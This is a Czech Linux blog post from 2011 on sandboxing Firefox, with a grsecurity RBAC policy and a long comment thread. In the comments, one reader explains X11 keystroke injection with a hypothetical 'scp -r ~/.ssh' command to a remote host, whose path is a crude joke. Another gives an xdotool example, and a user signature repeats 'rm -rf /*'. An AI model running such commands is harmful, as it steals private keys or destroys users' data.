abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 18:00 | IT novinky

    DuckDuckGo AI Chat umožňuje "pokecat si" s GPT-3.5 Turbo od OpenAI nebo Claude 1.2 Instant od Anthropic. Bez vytváření účtu. Všechny chaty jsou soukromé. DuckDuckGo je neukládá ani nepoužívá k trénování modelů umělé inteligence.

    Ladislav Hagara | Komentářů: 0
    dnes 14:22 | IT novinky

    VASA-1, výzkumný projekt Microsoftu. Na vstupu stačí jediná fotka a zvukový záznam. Na výstupu je dokonalá mluvící nebo zpívající hlava. Prý si technologii nechá jenom pro sebe. Žádné demo, API nebo placená služba. Zatím.

    Ladislav Hagara | Komentářů: 2
    dnes 04:44 | Nová verze

    Nová čísla časopisů od nakladatelství Raspberry Pi: MagPi 140 (pdf) a HackSpace 77 (pdf).

    Ladislav Hagara | Komentářů: 0
    dnes 01:00 | Nová verze

    ESPHome, tj. open source systém umožňující nastavovat zařízení s čipy ESP (i dalšími) pomocí konfiguračních souborů a připojit je do domácí automatizace, například do Home Assistantu, byl vydán ve verzi 2024.4.0.

    Ladislav Hagara | Komentářů: 0
    včera 22:11 | IT novinky Ladislav Hagara | Komentářů: 0
    včera 20:55 | Nová verze

    Neziskové průmyslové konsorcium Khronos Group vydalo verzi 1.1 specifikace OpenXR (Wikipedie), tj. standardu specifikujícího přístup k platformám a zařízením pro XR, tj. platformám a zařízením pro AR (rozšířenou realitu) a VR (virtuální realitu). Do základu se z rozšíření dostalo XR_EXT_local_floor. Společnost Collabora implementuje novou verzi specifikace do platformy Monado, tj. open source implementace OpenXR.

    Ladislav Hagara | Komentářů: 2
    včera 17:22 | Nová verze

    Byla vydána nová verze 0.38.0 multimediálního přehrávače mpv (Wikipedie) vycházejícího z přehrávačů MPlayer a mplayer2. Přehled novinek, změn a oprav na GitHubu. Požadován je FFmpeg 4.4 nebo novější a také libplacebo 6.338.2 nebo novější.

    Ladislav Hagara | Komentářů: 13
    včera 17:11 | Nová verze

    ClamAV (Wikipedie), tj. multiplatformní antivirový engine s otevřeným zdrojovým kódem pro detekci trojských koní, virů, malwaru a dalších škodlivých hrozeb, byl vydán ve verzích 1.3.1, 1.2.3 a 1.0.6. Ve verzi 1.3.1 je mimo jiné řešena bezpečnostní chyba CVE-2024-20380.

    Ladislav Hagara | Komentářů: 2
    včera 12:11 | IT novinky

    Digitální a informační agentura (DIA) oznámila (PDF, X a Facebook), že mobilní aplikace Portál občana je ode dneška oficiálně venku.

    Ladislav Hagara | Komentářů: 10
    včera 05:11 | Komunita

    #HACKUJBRNO 2024, byly zveřejněny výsledky a výstupy hackathonu města Brna nad otevřenými městskými daty, který se konal 13. a 14. dubna 2024.

    Ladislav Hagara | Komentářů: 2
    KDE Plasma 6
     (68%)
     (10%)
     (2%)
     (20%)
    Celkem 564 hlasů
     Komentářů: 4, poslední 6.4. 15:51
    Rozcestník

    Jak je to s tou bezpečností...

    12.7.2011 01:18 | Přečteno: 2293× | Linux | Výběrový blog | poslední úprava: 12.7.2011 01:16

    Nedávno jsem něco hledal na webu Mozilly a náhodou narazil na jednu zajímavou stránku. Ten pohled mě posadil na prdel. 18 kritických zranitelností za půl roku! Normální přístup by byl ten program smazat a najít si alternativu, to ale v tomhle případě z nejrůznějších důvodů není možné. A tak jsem začal řešit co s tím.

    Prakticky mi je jedno jestli útočník získá roota nebo ne - v situaci kdy je kompromitován uživatelský účet se už jedná o obrovský problém - útočník má okamžitě přístup k SSH a GPG klíčům, osobním dokumentům, historii IM a podobně. Takže je nutné omezit proces prohlížeče na přístup pouze k datům která potřebuje. Ale jak na to? Nakonec zůstalo jen pár možností.

    1) Vykašlat se na to

    Sázet na to, že nenarazím na žádnou stránku se 0day exploitem je sice nejjednodušší ale přece jen, není to zrovna ideální. Ale řeší to tak většina uživatelů tak nakonec proč ne?

    2) Separátní uživatel pro webový prohlížeč

    Tohle už vypadá slibněji, ale má to pár nedostatků. Stačí zapomenout na nějakém adresáři chmod 0755 a prohlížeč se tam dostane, také může prakticky volně lézt po celém systému (/etc, /usr, /var). Nic příjemného

    3) Chroot

    Tohle už poskytuje poměrně spolehlivou ochranu. Nevýhody jsou myslím jasné: nutnost kopírovat velké množství knihoven, udržovat minimální paralelní systém (i když se to dá rozumně automatizovat).

    4) Virtuální mašina

    Z hlediska bezpečnosti chroot na steroidech. Problémy jsou myslím jasné - obrovská spotřeba místa na disku a RAM, celková pomalost. Vzhledem k tomu jaký mám stroj jsem tuhle možnost hned zavrhnul.

    5) RBAC systém

    =Systém řízení přístupu založený na rolích. Výhody - poměrně slušné oddělení prohlížeče od okolního světa za cenu minimální spotřeby systémových prostředků. Jedinou nevýhodou je dost otravná konfigurace. A pak dilema jaký vybrat.

    5a) SELinux

    Nevěřím NSA. Stačí? Ne? Od tohohle průšvihu nevěřím moc ani SELinuxu. A na takovouhle jednoduchou úlohu je to moc komplikované.

    5b) RSBAC

    Mrtvý projekt, nemá cenu dál rozebírat.

    5c) AppArmor

    Tak tohle už vypadá poměrně zajímavě, navíc se dostal do jádra. Možnostmi konfigurace by vyhovoval - není nijak složitá a zároveň dostačující.

    5d) Grsecurity

    Ale nakonec to vyhrál Grsecurity i přes nespornou nevýhodu - není v jádře takže se musí externě patchovat. Na druhou stranu je v jednom .patch souboru i se systémem PaX, což je další výhoda. Jen bych krátce zmínil na co si dát při případném použití Grsecurity na desktopu pozor:

    No, a nakonec tu mám pravidla pro Firefox pokud to chce někdo zkusit a nechce se s tím patlat (pozor, cesty jsou podle Debianu, takže s/iceweasel/firefox). Pokud bude zájem postupem času doplním i pravidla pro další kritické aplikace (Minimálně Thunderbird/Icedove). Každopádně, omezí to přístup Firefoxu prakticky jen tam kde potřebuje (ok, /lib, /usr/lib a /usr/share jsem povolil celkově, nebavilo mě to vypisovat) a pak ~/Firefox a ~/Shared.

    subject /usr/bin/iceweasel o
    	-CAP_ALL
    	/			hs
    
    	/bin			hs
    	/bin/sh			rxi
    	/bin/which		rxi
    	/bin/readlink		rxi
    	
    	/dev/null		rw
    	/dev/urandom		rw
    	/dev/zero		rw
    	/dev/snd		rw
    
    	/etc/iceweasel		r
    	/etc/nsswitch.conf	r
    	/etc/resolv.conf	r
    	/etc/hosts		r
    	/etc/host.conf		r
    	/etc/passwd		r
    	/etc/group		r
    	/etc/fonts		r
    	/etc/localtime		r
    	/etc/gai.conf		r
    	/etc/ld.so.cache	r
    	/etc/locale.alias	r
    	/etc/mailcap		r
    	/etc/mime.types		r
    
    	/home			hs
    	/home/*			r
    	/home/*/Firefox 	rwcd
    	/home/*/.mozilla	rwcd
    	/home/*/Shared		rwcd
    	/home/*/.macromedia	rwcd
    	/home/*/.asoundrc	r
    	/home/*/.Xauthority	r
    	/home/*/.Xdefaults	r
    	/home/*/.cache/event-sound-cache rw
    	/home/*/.local/share/recently-used.xbel r
    	/home/*/*		hs
    
    	/lib			rxi
    
    	/proc			r
    	
    	/usr			r
    	/usr/*			hs
    	/usr/lib		rxi
    	/usr/bin		rxi
    	/usr/games		hs
    	/usr/local		hs
    
    	/usr/share		r
    
    	/run/dbus/system_bus_socket 	r
    
    	/tmp				rwcd
    
    	/var/cache/fontconfig		r
    	/var/tmp			rwcd
    	/var/lib/dbus/machine-id 	r
    	/var/lib/defoma			r
    
           

    Hodnocení: 83 %

            špatnédobré        

    Anketa

    Co vy?
     (77 %)
     (4 %)
     (4 %)
     (6 %)
     (13 %)
     (2 %)
     (11 %)
     (4 %)
     (23 %)
    Celkem 84 hlasů

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    Josef Kufner avatar 12.7.2011 01:45 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Co jsem si tak všimnul (benchmarky jsem nedělal), tak IE ve Virtualboxu na WinXP je zhruba stejně rychlý i paměťově náročný jako nativní Firefox verze 2.

    Nejlepší variantou by byl chroot vestavěný v prohlížeči. Nenáročné pro uživatele a přitom celkem bezpečné.
    Hello world ! Segmentation fault (core dumped)
    12.7.2011 09:14 Radovan Garabík
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nejlepší variantou by byl chroot vestavěný v prohlížeči
    - to by ale musel byť spúšťaný ako root (aspoň v normálnom svete)...
    pavlix avatar 12.7.2011 16:00 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nejlepší variantou by byl chroot vestavěný v prohlížeči. Nenáročné pro uživatele a přitom celkem bezpečné.
    To by bylo hodně smutné, kdyby nejlepší variantou byla taková věc jako chroot.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    cezz avatar 12.7.2011 17:05 cezz | skóre: 24 | blog: dm6
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To by bylo hodně smutné, kdyby nejlepší variantou byla taková věc jako chroot.
    +1
    Computers are not intelligent. They only think they are.
    Luk avatar 12.7.2011 02:04 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Firefox je tak pitomý že pokud nemá přístup do adresáře nastaveného jako cíl pro stahování tak nezobrazí chybovou hlášku a neskočí automaticky do nadřazeného adresáře jako každá normální aplikace ale prostě a jednoduše nic neudělá. Super, co?
    Zavraždit vývojáře málo ;-)

    Ad AppArmor - v openSUSE jsou již vytvořeny profily pro Firefox a Operu, nicméně jsou v extras, čili ve výchozím stavu se nepoužívají. Takže kdo to chce vyzkoušet, stačí přesunout potřebné profily přímo do /etc/apparmor.d a zapnout AppArmor jako takový.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    12.7.2011 02:16 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    A bug tim hnije i s patchem skoro čtyři roky.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Ruža Becelin avatar 12.7.2011 08:30 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    6) Stahnout si stranky na jinem PC webspiderem a prohlizet off-line.

    7) Vytrhnout kabel ze zdi a nepouzivat internet.

    :-D
    12.7.2011 09:41 kyytaM | skóre: 35 | blog: kyytaM | Bratislava
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    8) Najst si frajerku/frajera/domace zvieratko a nechodit po pochybnych strankach. :D
    Dalibor Smolík avatar 12.7.2011 10:01 Dalibor Smolík | skóre: 54 | blog: Postrehy_ze_zivota | 50°5'31.93"N,14°19'35.51"E
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Doporučuji zvířátko. To nekecá do výběru navštěvovaných stránek. :-)
    Rozdíly v řeči a ve zvyklostech neznamenají vůbec nic, budeme-li mít stejné cíle a otevřená srdce.
    12.7.2011 10:04 marek_hb
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    ale neuvaří ...
    vain avatar 12.7.2011 11:20 vain | skóre: 16
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To ani "dnešní frajerky" ;-)
    If the only choice you've got is to do the wrong thing, then it's not really the wrong thing, it's more like fate.
    AsciiWolf avatar 12.7.2011 12:44 AsciiWolf | skóre: 40 | blog: Blog
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    :-D
    Dalibor Smolík avatar 13.7.2011 17:06 Dalibor Smolík | skóre: 54 | blog: Postrehy_ze_zivota | 50°5'31.93"N,14°19'35.51"E
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    No právě :-)
    Rozdíly v řeči a ve zvyklostech neznamenají vůbec nic, budeme-li mít stejné cíle a otevřená srdce.
    12.7.2011 11:21 pasmen | skóre: 45 | blog: glob | Praha
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Ale může být uvařeno :-)
    12.7.2011 12:45 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To frajerka/frajer taky :)
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Jendа avatar 13.7.2011 00:15 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    houska avatar 12.7.2011 11:48 houska | skóre: 41 | blog: HW
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    a neoš*ká
    12.7.2011 12:01 pasmen | skóre: 45 | blog: glob | Praha
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    I tohle je sporné... :-)
    12.7.2011 12:47 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nesouhlasím.
    houska avatar 12.7.2011 14:40 houska | skóre: 41 | blog: HW
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    a jaky mas doma zvire?
    12.7.2011 18:01 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...

    Nejsi nějaký zvědavý? :-)

    No dobře, mám psa. ;-)

    kotyz avatar 12.7.2011 19:38 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Se psem by to slo ;-)
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    13.7.2011 09:32 polymorf | skóre: 14 | blog: tar_zxpf
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Pozor na svalovca
    kotyz avatar 13.7.2011 10:13 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To bys ho musel sežrat, jinak to nechytneš.
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    13.7.2011 18:52 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...

    +1

    Tohle se mne opravdu netýká. Jsem vegetarián. ;-)

    13.7.2011 21:04 w4rr10r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Orál?
    13.7.2011 22:42 x0r
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    ?
    kotyz avatar 13.7.2011 23:41 kotyz | skóre: 25 | blog: kotyzblog | Radnice
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Kloaka! :-D
    Mul-ti-pass! | Hrdý člen KERNEL ULTRAS. | Furry/Brony/Otaku | Nemám čas ztrácet čas. | In 'pacman -Syu' we trust!
    12.7.2011 15:54 Bubak
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Mohl by autor rozvest proc nejde pouzit napriklad Chromium? Z hlediska bezpecnosti je o svetelne roky napred (napriklad kazdy Tab ma vlastni sandbox).

    12.7.2011 17:16 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Rozšíření Tamper Data :)
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    AsciiWolf avatar 12.7.2011 17:20 AsciiWolf | skóre: 40 | blog: Blog
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    pavlix avatar 12.7.2011 15:58 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    mezi (3) a (4) chybí možnost kontejnerů, vzhledem k tomu, že u (4) tvrdíš, že virtualizace má obrovskou režii, tak určitě kontejnery nezahrnuješ.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    12.7.2011 17:19 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jo, ale pro kontejnery (řekněme OpenVZ) jsou nevýhody +- stejné jako u chrootu.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    pavlix avatar 12.7.2011 17:58 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jo, ale pro kontejnery (řekněme OpenVZ) jsou nevýhody +- stejné jako u chrootu.
    Kéž by :D.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    12.7.2011 16:34 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Hádám, že při použití chrootu/jiného usera apod. narazím na první problém ve chvíli, kdy tim browserem budu chtít něco vyuploadovat z disku, co? :)
    12.7.2011 17:11 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jo, jediná možnost je to šibovat třeba přes /tmp :)
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Josef Kufner avatar 12.7.2011 17:45 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Raději ~/tmp a nechat tam bydlet samouklízecí script ;-)
    Hello world ! Segmentation fault (core dumped)
    12.7.2011 17:37 marvn
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    a noscript by nestacil?
    Josef Kufner avatar 12.7.2011 17:44 Josef Kufner | skóre: 70
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nestačil. Bugy jsou i ve zpracování obrázků a dalších věcech. Navíc většina webů je bez javascriptu docela na nic :-(
    Hello world ! Segmentation fault (core dumped)
    12.7.2011 17:46 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Ne. Chyby nejsou jen v JS: 1, 2...
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    14.7.2011 10:56 marvn
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    jo no, pravda
    pavlix avatar 12.7.2011 17:59 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    A vytažení síťového kabelu? :)
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    elenril avatar 12.7.2011 17:57 elenril | skóre: 21 | blog: Raziel
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    5e) TOMOYO

    Je v jádře, vyvíjí se a jednoduše se nastavuje. Akorát o ní moc lidí neví, takže návodů člověk na internetech moc nenajde.
    Jendа avatar 13.7.2011 00:15 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Ano, už nad ním delší dobu medituju, ale pořád jsem neměl sílu to nastavit. Nějaká stránka s bezpečnostními politikami pro inspiraci? ;)
    elenril avatar 13.7.2011 12:27 elenril | skóre: 21 | blog: Raziel
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    O ničem nevim.

    Já ji mám v enforcing mode jen pro firefox. Tam jsem nejdřív na pár hodin zapnul learning mode (kde se každá operace automaticky povolí a přidá do whitelistu) a pak profiltroval výsledek.
    gtz avatar 12.7.2011 18:15 gtz | skóre: 27 | blog: gtz | Brno
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    copak by na ty ďoury řekl náš expert na Mozillu Péťa?
    - nejhorší jsou trpaslíci ... Ti Vám vlezou úplně všude
    12.7.2011 18:46 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To je otázka, jestli je i dostatečný expert i na ďoury...
    12.7.2011 18:47 kkaarreell | skóre: 6 | blog: perkele
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Se SElinuxem muzes pustit firefox v sandboxu, na tom nic sloziteho neni. Viz treba http://www.partlycloudy.org/2010/11/14/selinux-sandboxed-firefox.html
    12.7.2011 18:51 Woknař
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Doporučuji Lexaurin. Ta paranoia po něm trochu povolí.
    12.7.2011 18:57 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Doporučuju kouknout na kolika blacklistech je tvoje IP. To pak to sebevědomí trochu povolí.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    12.7.2011 21:46 smartin
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    ber to tak, ze u zavrenych prohlizecu vyjma Chrome (ktery je jen nadstavbou Chromium) o tehlech chybach nemas ani tuseni. IE by o tomhle mohlo psat sahodlouhe bakalarky.
    12.7.2011 23:10 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To není pravda, MS o bezpečnostních aktualizacích informuje, Opera taky. Ale řešit kdo je na tom hůř když jsou na tom tragicky všichni...
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    12.7.2011 22:20 ET
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    IMHO: sice se nevyhnes kompromitaci systemu, ale nic co by reboot nespravil - LIVE distro rulez - [nejlip vyprdnout z kernelu driver k radici disku, kdyz je clovek hodne paranoidni - coz asi zabije i cdromku, ale bootovat pres sit se taky da ]

    good luck

    PS: UTFG "ubuntu toram"
    12.7.2011 23:11 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To je ale DOST nepraktický.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    12.7.2011 23:20 ET
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    njn, jako vzdy je to boj "komfort vs bezpecnost" - ja jen pro doplneni

    btw: na i-banking bych nesel do niceho jinyho, ale je to holt individualni
    Jendа avatar 13.7.2011 00:15 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Pozor, i když jsi omezil přístup k souborům, pořád je to neosekaná X aplikace a může tedy keyloggerovat nebo posílat příkazy/klávesy ostatním aplikacím - třeba pošle 'scp -r ~/.ssh dastych@uooz.mvcr.cz:pripady/kinderporno/' xtermu.
    13.7.2011 00:52 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Pravda. Ale jaké řešení? Pouštět to v jiné instanci Xek?
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    Jendа avatar 13.7.2011 01:17 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Hrál jsem si s „nested“ X serverem (Xephyr, Xnest a spol), ale vyladit to k dokonalosti se mi to nepovedlo (nic moc GTK téma, nefunkční schránka, pomalá odezva kurzoru myši).
    13.7.2011 20:25 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To by šlo vyřešit tím že zakážeš fork() nebo zakážeš/omezíš execve() (a spol.) ne? Nevim jak se to dělá, ale podle nějakýho článku na linux.com by to se SELinux jít mělo (i když tam nebylo napsaný jak).

    Každopádně zabránit prohlížeči aby logoval klávesy a někam je posílal asi nejde.
    Jendа avatar 13.7.2011 20:30 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Forkování by mělo být tak nějak defaultně nastavené na dědění omezení (jako že když prohlížeč, co nemůže do .ssh, forkne cat, tak ten taky nebude moct do .ssh). Ale k hrátkám v X nový proces nepotřebuješ.
    13.7.2011 20:36 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Co jsou "hrátky v X" a co jaký jsou hrozby?
    13.7.2011 21:18 penej
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    bump pro výbornou bouřku v Praze (vážně mě to zajímá)
    Jendа avatar 13.7.2011 21:20 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Zkus si třeba
    xdotool key d a t e Return
    A takhle může třeba zkompromitovaný prohlížeč poslat terminálu libovolný příkaz.
    14.7.2011 00:00 marbu | skóre: 31 | blog: hromada | Brno
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Jak uz tu bylo nejednou receno, pokud ma program pristup ke tvym xkam (treba protoze na nich chce zobrazovat sve okno), muze sledovat udalosti stisknuti klaves nebo je generovat a to oboje pro libovolny program spusteny ve stejnych xkach. Hezky priklad treba zde: The Linux Security Circus: On GUI isolation.
    There is no point in being so cool in a cold world.
    1.8.2011 16:00 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    nasel jsem http://www.nsa.gov/research/_files/selinux/papers/x11/t1.shtml

    zatim jsem nemel cast to precist, ale vypada to ze presne resi tenhle problem
    1.8.2011 16:02 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    taky http://selinuxproject.org/page/NB_XWIN
    13.7.2011 10:38 penej
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nevěřím NSA. Stačí? Ne? Od tohohle průšvihu nevěřím moc ani SELinuxu. A na takovouhle jednoduchou úlohu je to moc komplikované.

    Jinak:

    V SELinuxu (tj. v mainline kernelu) je nejspíš trojan protože NSA odposlouchává telefony.

    Nebuď dumbfuck. Proč věříš grsecurity?

    A zapomněl jsi na TOMOYO.

    13.7.2011 11:41 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    V SELinuxu (tj. v mainline kernelu) je nejspíš trojan protože NSA odposlouchává telefony.
    Co? Nechápu souvislost mezi odposlechem telefonů a hypotetickým trojanem v SELinuxu.
    Proč věříš grsecurity?
    Protože pokud vím v grsec se ještě neobjevila zranitelnost typu local root :)
    A zapomněl jsi na TOMOYO.
    To jo.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 17:00 a.syntsow
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Objavila ...sice len 2* ale objavila. Neviem naco to tu riesis Mrkva. Viem ze chodis na spenderov kanal, preboha pytaj sa tam tych ludi. Je tam napriklad aj security vyvojar Ubuntu. Pytaj sa ich. Nie drbnutych ceskych stredoskolakov a pseudocelebritiek.
    13.7.2011 17:21 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Objavila ...sice len 2* ale objavila.
    Pravda, málo jsem hledal. Pardon.
    Neviem naco to tu riesis Mrkva
    Zajímá mě jak kdo řeší bezpečnost z místního osazenstva.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 17:25 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Viem ze chodis na spenderov kanal
    A tohle mi od paranoie nepomohlo.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 17:41 a.syntsow
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    To ta len slachti ze nie si ako oni. Tuto to proste neries oni to nepochopia. Ja som tam tiez my dvaja sme sa dokonca bavili len je asi moja paranoia vacsia ako tvoja :) Napis mi niekde jabber skontaktujem ta a ked tak mozme pokecat.
    13.7.2011 18:00 l5-1
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    spenderov kanal?
    13.7.2011 18:50 Mrkva | skóre: 22 | blog: urandom
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    #grsecurity na OFTC.
    Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
    13.7.2011 19:31 l5-1
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    proc se tomu rika spenderov kanal?
    13.7.2011 16:13 CEST
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Zalezi na tom, jak dlouho je takova chyba neopravena. Ze melo neco 18 chyb za pul roku neznamena, ze byly uspesne napadeny vsechny pocitace. Normalne to totiz funguje tak, ze nekdo najde chybu. Kdyz to je black-hat, tak je problem, ale web viry se spis mnozi po utocich script kiddies, black hat delaji neco lepsiho. Pokud je to white head, tak upozorni autory a ti maji cas na opravu. Pokud na to nekde kasle (slysel jsem Microsoft?), tak je potom sranda. Po nejake dobe je pak chyba zverejnena, ale pokud autor reagoval, tak je jiz opravena a uzivatele by meli byt v pohode - z toho plyne aktualizovat - ja vim, v tech Vistach/7 je to otrava (aktualizovat, aktualizovat pri vypinani, aktualizovat pri zapinani) a navic jeste kazdej program hlidat zvlast (nebo proste zvlast odklikat X aktualizatoru).

    Pokud uz nekdo hackne Linux, tak vetsinou proto, ze si nejakej uzivatel ulozi root heslo na ftp do totalcommandera, nebo si nastavi root heslo "abc123". Ja bych to nehrotil.

    BTW: Doufam, ze ty ssh klice a gpg klice mas chraneni silnou frazi a pouzivas agenty, jinak si zaslouzis, aby ti to uzivatel www-data zobrazil na http serveru:)

    Na stanici bych to tak neresil, jednou jsem pouzival Skype v chrootu a stacilo mi to. Pokud zpracovavas citlivy udaje, tak backup a bez site, na nejaky tvoje pecko neni moc nikdo zvedavej. Neco jinyho je server, ale opravdu moc zalezi na tom, co mas za data a pak taky zalezi na tom, jestli mas vysoky ztraty. Jestli se nic moc nedeje, ze se dostanou na verejnost, tak by mela stacit zaloha pro ztrate dat a poskozeni. No a pokud je to blby kdyz se pouze dostanou ven, tak radsi odpojit od inetu a provadet akce offline (podobne jako CA).
